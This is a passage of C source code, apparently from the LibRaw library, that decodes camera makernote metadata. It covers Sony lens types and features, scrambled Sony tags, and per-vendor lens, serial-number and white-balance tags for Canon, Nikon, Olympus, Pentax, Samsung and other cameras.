imgdata.lens.makernotes.CameraMount = LIBRAW_MOUNT_FixedLens;
imgdata.lens.makernotes.LensMount = LIBRAW_MOUNT_FixedLens;
imgdata.makernotes.sony.SonyCameraType = LIBRAW_SONY_DSC;
}
return;
}
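// parseSonyLensType2(): LensType2 values below 0x100 are adapter IDs (1/2/3/6 -> A-mount
// adapters, 44/78/239 -> Canon EF adapters); values 50481..50499 mark a Sigma MC-11;
// anything else is stored directly as the native LensID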
void CLASS parseSonyLensType2 (uchar a, uchar b) {
ushort lid2;
lid2 = (((ushort)a)<<8) | ((ushort)b);
if (!lid2) return;
if (lid2 < 0x100)
{
if ((imgdata.lens.makernotes.AdapterID != 0x4900) &&
(imgdata.lens.makernotes.AdapterID != 0xEF00))
{
imgdata.lens.makernotes.AdapterID = lid2;
switch (lid2) {
case 1:
case 2:
case 3:
case 6:
imgdata.lens.makernotes.LensMount = LIBRAW_MOUNT_Minolta_A;
break;
case 44:
case 78:
case 239:
imgdata.lens.makernotes.LensMount = LIBRAW_MOUNT_Canon_EF;
break;
}
}
}
else
imgdata.lens.makernotes.LensID = lid2;
if ((lid2 >= 50481) && (lid2 < 50500))
{
strcpy(imgdata.lens.makernotes.Adapter, "MC-11");
imgdata.lens.makernotes.AdapterID = 0x4900;
}
return;
}
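// strnXcat(): bounds-checked strncat() that can never write past 'buf';
// parseSonyLensFeatures() expands the feature bitmask into the lens prefix (E/FE/DT/PZ)
// and suffix (G, ZA, Macro, STF, Reflex, Fisheye, SSM, SAM, OSS, LE, II) strings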
#define strnXcat(buf,string) strncat(buf,string,LIM(sizeof(buf)-strbuflen(buf)-1,0,sizeof(buf)))
void CLASS parseSonyLensFeatures (uchar a, uchar b) {
ushort features;
features = (((ushort)a)<<8) | ((ushort)b);
if ((imgdata.lens.makernotes.LensMount == LIBRAW_MOUNT_Canon_EF) ||
      (imgdata.lens.makernotes.LensMount == LIBRAW_MOUNT_Sigma_X3F) || // bail out only for adapted (Canon EF / Sigma) lenses
!features)
return;
imgdata.lens.makernotes.LensFeatures_pre[0] = 0;
imgdata.lens.makernotes.LensFeatures_suf[0] = 0;
if ((features & 0x0200) && (features & 0x0100)) strcpy(imgdata.lens.makernotes.LensFeatures_pre, "E");
else if (features & 0x0200) strcpy(imgdata.lens.makernotes.LensFeatures_pre, "FE");
else if (features & 0x0100) strcpy(imgdata.lens.makernotes.LensFeatures_pre, "DT");
if (!imgdata.lens.makernotes.LensFormat && !imgdata.lens.makernotes.LensMount)
{
imgdata.lens.makernotes.LensFormat = LIBRAW_FORMAT_FF;
imgdata.lens.makernotes.LensMount = LIBRAW_MOUNT_Minolta_A;
if ((features & 0x0200) && (features & 0x0100)) {
imgdata.lens.makernotes.LensFormat = LIBRAW_FORMAT_APSC;
imgdata.lens.makernotes.LensMount = LIBRAW_MOUNT_Sony_E;
} else if (features & 0x0200) {
imgdata.lens.makernotes.LensMount = LIBRAW_MOUNT_Sony_E;
} else if (features & 0x0100) {
imgdata.lens.makernotes.LensFormat = LIBRAW_FORMAT_APSC;
}
}
if (features & 0x4000)
strnXcat(imgdata.lens.makernotes.LensFeatures_pre, " PZ");
if (features & 0x0008)
strnXcat(imgdata.lens.makernotes.LensFeatures_suf, " G");
else if (features & 0x0004)
strnXcat(imgdata.lens.makernotes.LensFeatures_suf, " ZA" );
if ((features & 0x0020) && (features & 0x0040))
strnXcat(imgdata.lens.makernotes.LensFeatures_suf, " Macro");
else if (features & 0x0020)
strnXcat(imgdata.lens.makernotes.LensFeatures_suf, " STF");
else if (features & 0x0040)
strnXcat(imgdata.lens.makernotes.LensFeatures_suf, " Reflex");
else if (features & 0x0080)
strnXcat(imgdata.lens.makernotes.LensFeatures_suf, " Fisheye");
if (features & 0x0001)
strnXcat(imgdata.lens.makernotes.LensFeatures_suf, " SSM");
else if (features & 0x0002)
strnXcat(imgdata.lens.makernotes.LensFeatures_suf, " SAM");
if (features & 0x8000)
strnXcat(imgdata.lens.makernotes.LensFeatures_suf, " OSS");
if (features & 0x2000)
strnXcat(imgdata.lens.makernotes.LensFeatures_suf, " LE");
if (features & 0x0800)
strnXcat(imgdata.lens.makernotes.LensFeatures_suf, " II");
if (imgdata.lens.makernotes.LensFeatures_suf[0] == ' ')
memmove(imgdata.lens.makernotes.LensFeatures_suf, imgdata.lens.makernotes.LensFeatures_suf+1,
strbuflen(imgdata.lens.makernotes.LensFeatures_suf)-1);
return;
}
#undef strnXcat
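// process_Sony_0x940c(): tag 0x940c data is byte-scrambled; SonySubstitution[] (defined elsewhere
// in this source) undoes the scrambling before the lens-mount byte and LensType2 are read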
void CLASS process_Sony_0x940c (uchar * buf)
{
ushort lid2;
if ((imgdata.lens.makernotes.LensMount != LIBRAW_MOUNT_Canon_EF) &&
(imgdata.lens.makernotes.LensMount != LIBRAW_MOUNT_Sigma_X3F))
{
switch (SonySubstitution[buf[0x0008]]) {
case 1:
case 5:
imgdata.lens.makernotes.LensMount = LIBRAW_MOUNT_Minolta_A;
break;
case 4:
imgdata.lens.makernotes.LensMount = LIBRAW_MOUNT_Sony_E;
break;
}
}
lid2 = (((ushort)SonySubstitution[buf[0x000a]])<<8) |
((ushort)SonySubstitution[buf[0x0009]]);
if ((lid2 > 0) && (lid2 < 32784))
parseSonyLensType2 (SonySubstitution[buf[0x000a]], // LensType2 - Sony lens ids
SonySubstitution[buf[0x0009]]);
return;
}
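// process_Sony_0x9050(): decodes the scrambled 0x9050 block: aperture limits, current aperture,
// lens mount/format, LensType2, Minolta/Sony LensID (with MC-11 / EF-adapter remapping),
// lens features and the internal body serial at model-dependent offsets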
void CLASS process_Sony_0x9050 (uchar * buf, unsigned id)
{
ushort lid;
if ((imgdata.lens.makernotes.CameraMount != LIBRAW_MOUNT_Sony_E) &&
(imgdata.lens.makernotes.CameraMount != LIBRAW_MOUNT_FixedLens))
{
if (buf[0])
imgdata.lens.makernotes.MaxAp4CurFocal =
my_roundf(libraw_powf64(2.0f, ((float)SonySubstitution[buf[0]] / 8.0 - 1.06f) / 2.0f)*10.0f) / 10.0f;
if (buf[1])
imgdata.lens.makernotes.MinAp4CurFocal =
my_roundf(libraw_powf64(2.0f, ((float)SonySubstitution[buf[1]] / 8.0 - 1.06f) / 2.0f)*10.0f) / 10.0f;
}
if (imgdata.lens.makernotes.CameraMount != LIBRAW_MOUNT_FixedLens)
{
if (buf[0x3d] | buf[0x3c])
{
lid = SonySubstitution[buf[0x3d]] << 8 |
SonySubstitution[buf[0x3c]];
imgdata.lens.makernotes.CurAp =
libraw_powf64(2.0f, ((float)lid/256.0f - 16.0f) / 2.0f);
}
if (buf[0x105] &&
(imgdata.lens.makernotes.LensMount != LIBRAW_MOUNT_Canon_EF) &&
(imgdata.lens.makernotes.LensMount != LIBRAW_MOUNT_Sigma_X3F))
imgdata.lens.makernotes.LensMount =
SonySubstitution[buf[0x105]];
if (buf[0x106])
imgdata.lens.makernotes.LensFormat =
SonySubstitution[buf[0x106]];
}
if (imgdata.lens.makernotes.CameraMount == LIBRAW_MOUNT_Sony_E)
{
parseSonyLensType2 (SonySubstitution[buf[0x0108]], // LensType2 - Sony lens ids
SonySubstitution[buf[0x0107]]);
}
if ((imgdata.lens.makernotes.LensID == -1) &&
(imgdata.lens.makernotes.CameraMount == LIBRAW_MOUNT_Minolta_A) &&
(buf[0x010a] | buf[0x0109]))
{
imgdata.lens.makernotes.LensID = // LensType - Minolta/Sony lens ids
SonySubstitution[buf[0x010a]] << 8 |
SonySubstitution[buf[0x0109]];
if ((imgdata.lens.makernotes.LensID > 0x4900) &&
(imgdata.lens.makernotes.LensID <= 0x5900))
{
imgdata.lens.makernotes.AdapterID = 0x4900;
imgdata.lens.makernotes.LensID -= imgdata.lens.makernotes.AdapterID;
imgdata.lens.makernotes.LensMount = LIBRAW_MOUNT_Sigma_X3F;
strcpy(imgdata.lens.makernotes.Adapter, "MC-11");
}
else if ((imgdata.lens.makernotes.LensID > 0xEF00) &&
(imgdata.lens.makernotes.LensID < 0xFFFF) &&
(imgdata.lens.makernotes.LensID != 0xFF00))
{
imgdata.lens.makernotes.AdapterID = 0xEF00;
imgdata.lens.makernotes.LensID -= imgdata.lens.makernotes.AdapterID;
imgdata.lens.makernotes.LensMount = LIBRAW_MOUNT_Canon_EF;
}
}
if ((id >= 286) && (id <= 293))
// "SLT-A65", "SLT-A77", "NEX-7", "NEX-VG20E",
// "SLT-A37", "SLT-A57", "NEX-F3", "Lunar"
parseSonyLensFeatures (SonySubstitution[buf[0x115]],
SonySubstitution[buf[0x116]]);
else if (imgdata.lens.makernotes.CameraMount != LIBRAW_MOUNT_FixedLens)
parseSonyLensFeatures(SonySubstitution[buf[0x116]], SonySubstitution[buf[0x117]]);
if ((id == 347) || (id == 350) || (id == 357))
{
unsigned long long b88 = SonySubstitution[buf[0x88]];
unsigned long long b89 = SonySubstitution[buf[0x89]];
unsigned long long b8a = SonySubstitution[buf[0x8a]];
unsigned long long b8b = SonySubstitution[buf[0x8b]];
unsigned long long b8c = SonySubstitution[buf[0x8c]];
unsigned long long b8d = SonySubstitution[buf[0x8d]];
sprintf(imgdata.shootinginfo.InternalBodySerial, "%06llx",
(b88 << 40) + (b89 << 32) + (b8a << 24) + (b8b << 16) + (b8c << 8) + b8d);
}
else if ((imgdata.lens.makernotes.CameraMount == LIBRAW_MOUNT_Minolta_A) && (id > 279) && (id != 282) && (id != 283))
{
unsigned long long bf0 = SonySubstitution[buf[0xf0]];
unsigned long long bf1 = SonySubstitution[buf[0xf1]];
unsigned long long bf2 = SonySubstitution[buf[0xf2]];
unsigned long long bf3 = SonySubstitution[buf[0xf3]];
unsigned long long bf4 = SonySubstitution[buf[0xf4]];
sprintf(imgdata.shootinginfo.InternalBodySerial, "%05llx",
(bf0 << 32) + (bf1 << 24) + (bf2 << 16) + (bf3 << 8) + bf4);
}
else if ((imgdata.lens.makernotes.CameraMount == LIBRAW_MOUNT_Sony_E) && (id != 288) && (id != 289) && (id != 290))
{
unsigned b7c = SonySubstitution[buf[0x7c]];
unsigned b7d = SonySubstitution[buf[0x7d]];
unsigned b7e = SonySubstitution[buf[0x7e]];
unsigned b7f = SonySubstitution[buf[0x7f]];
sprintf(imgdata.shootinginfo.InternalBodySerial, "%04x", (b7c << 24) + (b7d << 16) + (b7e << 8) + b7f);
}
return;
}
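// parse_makernote_0xc634(): MakerNote parser for notes embedded in DNG files
// (tag 0xc634, DNGPrivateData); detects the vendor signature, then dispatches
// per-vendor tag handling below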
void CLASS parse_makernote_0xc634(int base, int uptag, unsigned dng_writer)
{
unsigned ver97 = 0, offset = 0, entries, tag, type, len, save, c;
unsigned i;
uchar NikonKey, ci, cj, ck;
unsigned serial = 0;
unsigned custom_serial = 0;
unsigned NikonLensDataVersion = 0;
unsigned lenNikonLensData = 0;
unsigned NikonFlashInfoVersion = 0;
uchar *CanonCameraInfo;
unsigned lenCanonCameraInfo = 0;
uchar *table_buf;
uchar *table_buf_0x9050;
ushort table_buf_0x9050_present = 0;
uchar *table_buf_0x940c;
ushort table_buf_0x940c_present = 0;
short morder, sorder = order;
char buf[10];
INT64 fsize = ifp->size();
fread(buf, 1, 10, ifp);
if (!strcmp(buf, "Nikon")) {
base = ftell(ifp);
order = get2();
if (get2() != 42) goto quit;
offset = get4();
fseek(ifp, offset - 8, SEEK_CUR);
}
else if (!strcmp(buf, "OLYMPUS") ||
!strcmp(buf, "PENTAX ") ||
(!strncmp(make, "SAMSUNG", 7) && (dng_writer == CameraDNG))) {
base = ftell(ifp) - 10;
fseek(ifp, -2, SEEK_CUR);
order = get2();
if (buf[0] == 'O') get2();
}
else if (!strncmp(buf, "SONY", 4) ||
!strcmp(buf, "Panasonic")) {
goto nf;
}
else if (!strncmp(buf, "FUJIFILM", 8)) {
base = ftell(ifp) - 10;
nf: order = 0x4949;
fseek(ifp, 2, SEEK_CUR);
}
else if (!strcmp(buf, "OLYMP") ||
!strcmp(buf, "LEICA") ||
!strcmp(buf, "Ricoh") ||
!strcmp(buf, "EPSON"))
fseek(ifp, -2, SEEK_CUR);
else if (!strcmp(buf, "AOC") ||
!strcmp(buf, "QVC"))
fseek(ifp, -4, SEEK_CUR);
else {
fseek(ifp, -10, SEEK_CUR);
if ((!strncmp(make, "SAMSUNG", 7) &&
(dng_writer == AdobeDNG)))
base = ftell(ifp);
}
entries = get2();
if (entries > 1000) return;
morder = order;
while (entries--) {
order = morder;
tiff_get(base, &tag, &type, &len, &save);
INT64 pos = ifp->tell();
    if(len > 8 && pos+len > 2* fsize)
    {
      fseek(ifp, save, SEEK_SET); // restore the IFD read position before skipping this oversized tag
      continue;
    }
tag |= uptag << 16;
if(len > 100*1024*1024) goto next; // 100Mb tag? No!
if (!strncmp(make, "Canon",5))
{
if (tag == 0x000d && len < 256000) // camera info
{
CanonCameraInfo = (uchar*)malloc(MAX(16,len));
fread(CanonCameraInfo, len, 1, ifp);
lenCanonCameraInfo = len;
}
else if (tag == 0x10) // Canon ModelID
{
unique_id = get4();
if (unique_id == 0x03740000) unique_id = 0x80000374; // M3
if (unique_id == 0x03840000) unique_id = 0x80000384; // M10
if (unique_id == 0x03940000) unique_id = 0x80000394; // M5
setCanonBodyFeatures(unique_id);
if (lenCanonCameraInfo)
{
processCanonCameraInfo(unique_id, CanonCameraInfo,lenCanonCameraInfo);
free(CanonCameraInfo);
CanonCameraInfo = 0;
lenCanonCameraInfo = 0;
}
}
else parseCanonMakernotes (tag, type, len);
}
else if (!strncmp(make, "FUJI", 4))
parseFujiMakernotes (tag, type);
else if (!strncasecmp(make, "LEICA", 5))
{
if (((tag == 0x035e) || (tag == 0x035f)) && (type == 10) && (len == 9))
{
int ind = tag == 0x035e?0:1;
for (int j=0; j < 3; j++)
FORCC imgdata.color.dng_color[ind].forwardmatrix[j][c]= getreal(type);
}
if ((tag == 0x0303) && (type != 4))
{
stmread(imgdata.lens.makernotes.Lens, len,ifp);
}
if ((tag == 0x3405) ||
(tag == 0x0310) ||
(tag == 0x34003405))
{
imgdata.lens.makernotes.LensID = get4();
imgdata.lens.makernotes.LensID =
((imgdata.lens.makernotes.LensID>>2)<<8) |
(imgdata.lens.makernotes.LensID & 0x3);
if (imgdata.lens.makernotes.LensID != -1)
{
if ((model[0] == 'M') ||
!strncasecmp (model, "LEICA M", 7))
{
imgdata.lens.makernotes.CameraMount = LIBRAW_MOUNT_Leica_M;
if (imgdata.lens.makernotes.LensID)
imgdata.lens.makernotes.LensMount = LIBRAW_MOUNT_Leica_M;
}
else if ((model[0] == 'S') ||
!strncasecmp (model, "LEICA S", 7))
{
imgdata.lens.makernotes.CameraMount = LIBRAW_MOUNT_Leica_S;
if (imgdata.lens.makernotes.Lens[0])
imgdata.lens.makernotes.LensMount = LIBRAW_MOUNT_Leica_S;
}
}
}
else if (
((tag == 0x0313) || (tag == 0x34003406)) &&
(fabs(imgdata.lens.makernotes.CurAp) < 0.17f) &&
((type == 10) || (type == 5))
)
{
imgdata.lens.makernotes.CurAp = getreal(type);
if (imgdata.lens.makernotes.CurAp > 126.3)
imgdata.lens.makernotes.CurAp = 0.0f;
}
else if (tag == 0x3400)
{
parse_makernote (base, 0x3400);
}
}
else if (!strncmp(make, "NIKON", 5))
{
if (tag == 0x1d) // serial number
while ((c = fgetc(ifp)) && c != EOF)
{
if ((!custom_serial) && (!isdigit(c)))
{
if ((strbuflen(model) == 3) && (!strcmp(model,"D50")))
{
custom_serial = 34;
}
else
{
custom_serial = 96;
}
}
serial = serial*10 + (isdigit(c) ? c - '0' : c % 10);
}
else if (tag == 0x000a)
{
imgdata.lens.makernotes.LensMount = LIBRAW_MOUNT_FixedLens;
imgdata.lens.makernotes.CameraMount = LIBRAW_MOUNT_FixedLens;
}
else if (tag == 0x0082) // lens attachment
{
stmread(imgdata.lens.makernotes.Attachment, len, ifp);
}
else if (tag == 0x0083) // lens type
{
imgdata.lens.nikon.NikonLensType = fgetc(ifp);
}
else if (tag == 0x0084) // lens
{
imgdata.lens.makernotes.MinFocal = getreal(type);
imgdata.lens.makernotes.MaxFocal = getreal(type);
imgdata.lens.makernotes.MaxAp4MinFocal = getreal(type);
imgdata.lens.makernotes.MaxAp4MaxFocal = getreal(type);
}
else if (tag == 0x008b) // lens f-stops
{
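          // the f-stop span is stored scaled to 1/12-stop units (NikonLensFStops),
          // then converted to stops in LensFStops below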
uchar a, b, c;
a = fgetc(ifp);
b = fgetc(ifp);
c = fgetc(ifp);
if (c)
{
imgdata.lens.nikon.NikonLensFStops = a*b*(12/c);
imgdata.lens.makernotes.LensFStops =
(float)imgdata.lens.nikon.NikonLensFStops /12.0f;
}
}
else if (tag == 0x0093)
{
i = get2();
if ((i == 7) || (i == 9))
{
imgdata.lens.makernotes.LensMount = LIBRAW_MOUNT_FixedLens;
imgdata.lens.makernotes.CameraMount = LIBRAW_MOUNT_FixedLens;
}
}
else if (tag == 0x0097)
{
for (i=0; i < 4; i++)
ver97 = ver97 * 10 + fgetc(ifp)-'0';
if (ver97 == 601) // Coolpix A
{
imgdata.lens.makernotes.LensMount = LIBRAW_MOUNT_FixedLens;
imgdata.lens.makernotes.CameraMount = LIBRAW_MOUNT_FixedLens;
}
}
else if (tag == 0x0098) // contains lens data
{
for (i = 0; i < 4; i++)
{
NikonLensDataVersion = NikonLensDataVersion * 10 + fgetc(ifp) - '0';
}
switch (NikonLensDataVersion)
{
case 100: lenNikonLensData = 9; break;
case 101:
case 201: // encrypted, starting from v.201
case 202:
case 203: lenNikonLensData = 15; break;
case 204: lenNikonLensData = 16; break;
case 400: lenNikonLensData = 459; break;
case 401: lenNikonLensData = 590; break;
case 402: lenNikonLensData = 509; break;
case 403: lenNikonLensData = 879; break;
}
if(lenNikonLensData)
{
table_buf = (uchar*)malloc(lenNikonLensData);
fread(table_buf, lenNikonLensData, 1, ifp);
if ((NikonLensDataVersion < 201) && lenNikonLensData)
{
processNikonLensData(table_buf, lenNikonLensData);
free(table_buf);
lenNikonLensData = 0;
}
}
}
else if (tag == 0xa7) // shutter count
{
NikonKey = fgetc(ifp) ^ fgetc(ifp) ^ fgetc(ifp) ^ fgetc(ifp);
if ((NikonLensDataVersion > 200) && lenNikonLensData)
{
if (custom_serial)
{
ci = xlat[0][custom_serial];
}
else
{
ci = xlat[0][serial & 0xff];
}
cj = xlat[1][NikonKey];
ck = 0x60;
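              // dcraw-style Nikon de-obfuscation: the running key cj advances by ci*ck
              // (ck increments each byte) and is XORed over the stored LensData block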
for (i = 0; i < lenNikonLensData; i++)
table_buf[i] ^= (cj += ci * ck++);
processNikonLensData(table_buf, lenNikonLensData);
lenNikonLensData = 0;
free(table_buf);
}
}
else if (tag == 0x00a8) // contains flash data
{
for (i = 0; i < 4; i++)
{
NikonFlashInfoVersion = NikonFlashInfoVersion * 10 + fgetc(ifp) - '0';
}
}
else if (tag == 37 && (!iso_speed || iso_speed == 65535))
{
unsigned char cc;
fread(&cc, 1, 1, ifp);
iso_speed = (int)(100.0 * libraw_powf64(2.0, (double)(cc) / 12.0 - 5.0));
break;
}
}
else if (!strncmp(make, "OLYMPUS", 7))
{
int SubDirOffsetValid =
strncmp (model, "E-300", 5) &&
strncmp (model, "E-330", 5) &&
strncmp (model, "E-400", 5) &&
strncmp (model, "E-500", 5) &&
strncmp (model, "E-1", 3);
if ((tag == 0x2010) || (tag == 0x2020))
{
fseek(ifp, save - 4, SEEK_SET);
fseek(ifp, base + get4(), SEEK_SET);
parse_makernote_0xc634(base, tag, dng_writer);
}
if (!SubDirOffsetValid &&
((len > 4) ||
( ((type == 3) || (type == 8)) && (len > 2)) ||
( ((type == 4) || (type == 9)) && (len > 1)) || (type == 5) || (type > 9)))
goto skip_Oly_broken_tags;
switch (tag) {
case 0x0207:
case 0x20100100:
{
uchar sOlyID[8];
unsigned long long OlyID;
fread (sOlyID, MIN(len,7), 1, ifp);
sOlyID[7] = 0;
OlyID = sOlyID[0];
i = 1;
while (i < 7 && sOlyID[i])
{
OlyID = OlyID << 8 | sOlyID[i];
i++;
}
setOlympusBodyFeatures(OlyID);
}
break;
case 0x1002:
imgdata.lens.makernotes.CurAp = libraw_powf64(2.0f, getreal(type)/2);
break;
case 0x20100102:
stmread(imgdata.shootinginfo.InternalBodySerial, len, ifp);
break;
case 0x20100201:
          {
            // read the LensType bytes in a defined order ('|' operands are unsequenced)
            unsigned long long oly_lensid[3];
            oly_lensid[0] = fgetc(ifp);
            fgetc(ifp); // byte 1 is not used
            oly_lensid[1] = fgetc(ifp);
            oly_lensid[2] = fgetc(ifp);
            imgdata.lens.makernotes.LensID =
              (oly_lensid[0] << 16) | (oly_lensid[1] << 8) | oly_lensid[2];
          }
imgdata.lens.makernotes.LensMount = LIBRAW_MOUNT_FT;
imgdata.lens.makernotes.LensFormat = LIBRAW_FORMAT_FT;
if (((imgdata.lens.makernotes.LensID < 0x20000) ||
(imgdata.lens.makernotes.LensID > 0x4ffff)) &&
(imgdata.lens.makernotes.LensID & 0x10))
{
imgdata.lens.makernotes.LensMount = LIBRAW_MOUNT_mFT;
}
break;
case 0x20100202:
if ((!imgdata.lens.LensSerial[0]))
stmread(imgdata.lens.LensSerial, len, ifp);
break;
case 0x20100203:
stmread(imgdata.lens.makernotes.Lens,len, ifp);
break;
case 0x20100205:
imgdata.lens.makernotes.MaxAp4MinFocal = libraw_powf64(sqrt(2.0f), get2() / 256.0f);
break;
case 0x20100206:
imgdata.lens.makernotes.MaxAp4MaxFocal = libraw_powf64(sqrt(2.0f), get2() / 256.0f);
break;
case 0x20100207:
imgdata.lens.makernotes.MinFocal = (float)get2();
break;
case 0x20100208:
imgdata.lens.makernotes.MaxFocal = (float)get2();
if (imgdata.lens.makernotes.MaxFocal > 1000.0f)
imgdata.lens.makernotes.MaxFocal = imgdata.lens.makernotes.MinFocal;
break;
case 0x2010020a:
imgdata.lens.makernotes.MaxAp4CurFocal = libraw_powf64(sqrt(2.0f), get2() / 256.0f);
break;
case 0x20100301:
imgdata.lens.makernotes.TeleconverterID = fgetc(ifp) << 8;
fgetc(ifp);
imgdata.lens.makernotes.TeleconverterID =
imgdata.lens.makernotes.TeleconverterID | fgetc(ifp);
break;
case 0x20100303:
stmread(imgdata.lens.makernotes.Teleconverter, len, ifp);
break;
case 0x20100403:
stmread(imgdata.lens.makernotes.Attachment,len, ifp);
break;
case 0x20200401:
imgdata.other.FlashEC = getreal(type);
break;
}
skip_Oly_broken_tags:;
}
else if (!strncmp(make, "PENTAX", 6) ||
!strncmp(model, "PENTAX", 6) ||
(!strncmp(make, "SAMSUNG", 7) && (dng_writer == CameraDNG)))
{
if (tag == 0x0005)
{
unique_id = get4();
setPentaxBodyFeatures(unique_id);
}
else if (tag == 0x0013)
{
imgdata.lens.makernotes.CurAp = (float)get2()/10.0f;
}
else if (tag == 0x0014)
{
PentaxISO(get2());
}
else if (tag == 0x001d)
{
imgdata.lens.makernotes.CurFocal = (float)get4()/100.0f;
}
else if (tag == 0x003f)
{
imgdata.lens.makernotes.LensID = fgetc(ifp) << 8 | fgetc(ifp);
}
else if (tag == 0x004d)
{
if (type == 9) imgdata.other.FlashEC = getreal(type) / 256.0f;
else imgdata.other.FlashEC = (float) ((signed short) fgetc(ifp)) / 6.0f;
}
else if (tag == 0x007e)
{
imgdata.color.linear_max[0] =
imgdata.color.linear_max[1] =
imgdata.color.linear_max[2] =
imgdata.color.linear_max[3] = (long)(-1) * get4();
}
else if (tag == 0x0207)
{
if(len < 65535) // Safety belt
PentaxLensInfo(imgdata.lens.makernotes.CamID, len);
}
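        // tags 0x020d..0x0214 hold per-illuminant WB presets as four shorts;
        // the c ^ (c >> 1) index swaps the last two channel slots when storing into WB_Coeffs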
else if (tag == 0x020d)
{
FORC4 imgdata.color.WB_Coeffs[LIBRAW_WBI_Daylight][c ^ (c >> 1)] = get2();
}
else if (tag == 0x020e)
{
FORC4 imgdata.color.WB_Coeffs[LIBRAW_WBI_Shade][c ^ (c >> 1)] = get2();
}
else if (tag == 0x020f)
{
FORC4 imgdata.color.WB_Coeffs[LIBRAW_WBI_Cloudy][c ^ (c >> 1)] = get2();
}
else if (tag == 0x0210)
{
FORC4 imgdata.color.WB_Coeffs[LIBRAW_WBI_Tungsten][c ^ (c >> 1)] = get2();
}
else if (tag == 0x0211)
{
FORC4 imgdata.color.WB_Coeffs[LIBRAW_WBI_FL_D][c ^ (c >> 1)] = get2();
}
else if (tag == 0x0212)
{
FORC4 imgdata.color.WB_Coeffs[LIBRAW_WBI_FL_N][c ^ (c >> 1)] = get2();
}
else if (tag == 0x0213)
{
FORC4 imgdata.color.WB_Coeffs[LIBRAW_WBI_FL_W][c ^ (c >> 1)] = get2();
}
else if (tag == 0x0214)
{
FORC4 imgdata.color.WB_Coeffs[LIBRAW_WBI_Flash][c ^ (c >> 1)] = get2();
}
else if (tag == 0x0221)
{
int nWB = get2();
if(nWB<=sizeof(imgdata.color.WBCT_Coeffs)/sizeof(imgdata.color.WBCT_Coeffs[0]))
for (int i = 0; i < nWB; i++)
{
imgdata.color.WBCT_Coeffs[i][0] = (unsigned)0xcfc6 - get2();
fseek(ifp, 2, SEEK_CUR);
imgdata.color.WBCT_Coeffs[i][1] = get2();
imgdata.color.WBCT_Coeffs[i][2] = imgdata.color.WBCT_Coeffs[i][4] = 0x2000;
imgdata.color.WBCT_Coeffs[i][3] = get2();
}
}
else if (tag == 0x0215)
{
fseek (ifp, 16, SEEK_CUR);
sprintf(imgdata.shootinginfo.InternalBodySerial, "%d", get4());
}
else if (tag == 0x0229)
{
stmread(imgdata.shootinginfo.BodySerial, len, ifp);
}
else if (tag == 0x022d)
{
fseek (ifp,2,SEEK_CUR);
FORC4 imgdata.color.WB_Coeffs[LIBRAW_WBI_Daylight][c ^ (c >> 1)] = get2();
getc(ifp);
FORC4 imgdata.color.WB_Coeffs[LIBRAW_WBI_Shade][c ^ (c >> 1)] = get2();
getc(ifp);
FORC4 imgdata.color.WB_Coeffs[LIBRAW_WBI_Cloudy][c ^ (c >> 1)] = get2();
getc(ifp);
FORC4 imgdata.color.WB_Coeffs[LIBRAW_WBI_Tungsten][c ^ (c >> 1)] = get2();
getc(ifp);
FORC4 imgdata.color.WB_Coeffs[LIBRAW_WBI_FL_D][c ^ (c >> 1)] = get2();
getc(ifp);
FORC4 imgdata.color.WB_Coeffs[LIBRAW_WBI_FL_N][c ^ (c >> 1)] = get2();
getc(ifp);
FORC4 imgdata.color.WB_Coeffs[LIBRAW_WBI_FL_W][c ^ (c >> 1)] = get2();
getc(ifp);
FORC4 imgdata.color.WB_Coeffs[LIBRAW_WBI_Flash][c ^ (c >> 1)] = get2();
getc(ifp);
FORC4 imgdata.color.WB_Coeffs[LIBRAW_WBI_FL_L][c ^ (c >> 1)] = get2();
}
else if (tag == 0x0239) // Q-series lens info (LensInfoQ)
{
char LensInfo [20];
fseek (ifp, 12, SEEK_CUR);
stread(imgdata.lens.makernotes.Lens, 30, ifp);
strcat(imgdata.lens.makernotes.Lens, " ");
stread(LensInfo, 20, ifp);
strcat(imgdata.lens.makernotes.Lens, LensInfo);
}
}
else if (!strncmp(make, "SAMSUNG", 7) &&
(dng_writer == AdobeDNG))
{
if (tag == 0x0002)
{
if(get4() == 0x2000)
{
imgdata.lens.makernotes.CameraMount = LIBRAW_MOUNT_Samsung_NX;
}
else if (!strncmp(model, "NX mini", 7))
{
imgdata.lens.makernotes.CameraMount = LIBRAW_MOUNT_Samsung_NX_M;
}
else
{
imgdata.lens.makernotes.CameraMount = LIBRAW_MOUNT_FixedLens;
imgdata.lens.makernotes.LensMount = LIBRAW_MOUNT_FixedLens;
}
}
else if (tag == 0x0003)
{
imgdata.lens.makernotes.CamID = unique_id = get4();
}
else if (tag == 0xa003)
{
imgdata.lens.makernotes.LensID = get2();
if (imgdata.lens.makernotes.LensID)
imgdata.lens.makernotes.LensMount = LIBRAW_MOUNT_Samsung_NX;
}
else if (tag == 0xa005)
{
stmread(imgdata.lens.InternalLensSerial, len, ifp);
}
else if (tag == 0xa019)
{
imgdata.lens.makernotes.CurAp = getreal(type);
}
else if (tag == 0xa01a)
{
imgdata.lens.makernotes.FocalLengthIn35mmFormat = get4() / 10.0f;
if (imgdata.lens.makernotes.FocalLengthIn35mmFormat < 10.0f)
imgdata.lens.makernotes.FocalLengthIn35mmFormat *= 10.0f;
}
}
else if (!strncasecmp(make, "SONY", 4) ||
!strncasecmp(make, "Konica", 6) ||
!strncasecmp(make, "Minolta", 7) ||
(!strncasecmp(make, "Hasselblad", 10) &&
(!strncasecmp(model, "Stellar", 7) ||
!strncasecmp(model, "Lunar", 5) ||
!strncasecmp(model, "Lusso", 5) ||
!strncasecmp(model, "HV",2))))
{
ushort lid;
if (tag == 0xb001) // Sony ModelID
{
unique_id = get2();
setSonyBodyFeatures(unique_id);
if (table_buf_0x9050_present)
{
process_Sony_0x9050(table_buf_0x9050, unique_id);
free (table_buf_0x9050);
table_buf_0x9050_present = 0;
}
if (table_buf_0x940c_present)
{
if (imgdata.lens.makernotes.CameraMount == LIBRAW_MOUNT_Sony_E)
{
process_Sony_0x940c(table_buf_0x940c);
}
free (table_buf_0x940c);
table_buf_0x940c_present = 0;
}
}
else if ((tag == 0x0010) && // CameraInfo
strncasecmp(model, "DSLR-A100", 9) &&
strncasecmp(model, "NEX-5C", 6) &&
!strncasecmp(make, "SONY", 4) &&
((len == 368) || // a700
(len == 5478) || // a850, a900
(len == 5506) || // a200, a300, a350
(len == 6118) || // a230, a290, a330, a380, a390
// a450, a500, a550, a560, a580
// a33, a35, a55
// NEX3, NEX5, NEX5C, NEXC3, VG10E
(len == 15360))
)
{
table_buf = (uchar*)malloc(len);
fread(table_buf, len, 1, ifp);
if (memcmp(table_buf, "\xff\xff\xff\xff\xff\xff\xff\xff", 8) &&
